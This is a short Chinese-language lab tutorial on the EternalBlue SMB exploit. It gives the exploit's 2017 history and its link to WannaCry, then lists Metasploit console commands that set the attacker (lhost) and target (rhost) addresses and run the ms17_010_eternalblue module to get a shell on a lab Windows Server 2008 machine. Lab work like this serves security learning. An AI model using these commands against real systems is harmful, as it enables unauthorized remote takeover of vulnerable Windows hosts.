永恒之蓝是2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布的一大批网络攻击工具中的其中一个。“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒。
实验一:获取windows server 2008的shell
实验环境:攻击机:kali 靶机:windows server 2008 kali IP:192.168.3.129 win 2008 IP:192.168.3.128
root@kali:~# msfconsole [-] ***rting the MetaSploit Framework console.../ ... msf5 > use exploit/windows/smb/ms17_010_eternalblue msf5 exploit(windows/smb/ms17_010_eternalblue) > set processname lsass.exe processname => lsass.exe msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.3.129 lhost => 192.168.3.129 msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.3.128 rhost => 192.168.3.128 msf5 exploit(windows/smb/ms17_010_eternalblue) > run